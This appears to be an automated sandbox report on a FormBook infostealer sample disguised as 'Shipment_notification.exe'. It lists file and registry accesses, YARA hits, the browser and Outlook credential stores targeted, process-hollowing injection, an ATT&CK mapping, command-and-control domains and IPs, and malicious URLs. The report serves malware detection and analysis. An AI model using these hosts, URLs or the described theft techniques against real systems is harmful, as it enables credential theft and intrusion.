          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception612
          Process Injection          		1
          Masquerading          		1
          OS Credential Dumping          		21
          Security Software Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Data from Local System          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain Credentials13
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items3
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          File Deletion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830738 Sample: Shipment_notification.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 27 www.amirah.cfd 2->27 35 Snort IDS alert for network traffic 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus detection for URL or domain 2->39 41 3 other signatures 2->41 9 Shipment_notification.exe 3 2->9         started        signatures3 process4 file5 25 C:\Users\...\Shipment_notification.exe.log, ASCII 9->25 dropped 55 Injects a PE file into a foreign processes 9->55 13 Shipment_notification.exe 9->13         started        16 Shipment_notification.exe 9->16         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 13->57 59 Maps a DLL or memory area into another process 13->59 61 Sample uses process hollowing technique 13->61 63 Queues an APC in another process (thread injection) 13->63 18 explorer.exe 1 13->18 injected process9 dnsIp10 29 www.locationsbormes.com 45.114.105.2, 49707, 49708, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS China 18->29 31 carcosainvest.com 206.54.190.30, 49699, 49700, 80 WZCOM-US United States 18->31 33 9 other IPs or domains 18->33 43 System process connects to network (likely due to code injection or exploit) 18->43 45 Performs DNS queries to domains with low reputation 18->45 22 control.exe 13 18->22         started        signatures11 process12 signatures13 47 Tries to steal Mail credentials (via file / registry access) 22->47 49 Tries to harvest and steal browser information (history, passwords, etc) 22->49 51 Deletes itself after installation 22->51 53 2 other signatures 22->53

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Shipment_notification.exe39%ReversingLabsWin32.Trojan.Generic
          Shipment_notification.exe43%VirustotalBrowse
          Shipment_notification.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.Shipment_notification.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.searchvity.com/?dn=100%URL Reputationmalware
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sajatypeworks.comz0%URL Reputationsafe
          http://www.fontbureau.comzana0%URL Reputationsafe
          http://www.carterandcone.comn0%URL Reputationsafe
          http://www.ywtxsm.com/rs5b/Pr100%Avira URL Cloudmalware
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.carterandcone.comx0%URL Reputationsafe
          http://www.searchvity.com/100%URL Reputationmalware
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.zhongyicts.com.cno.0%URL Reputationsafe
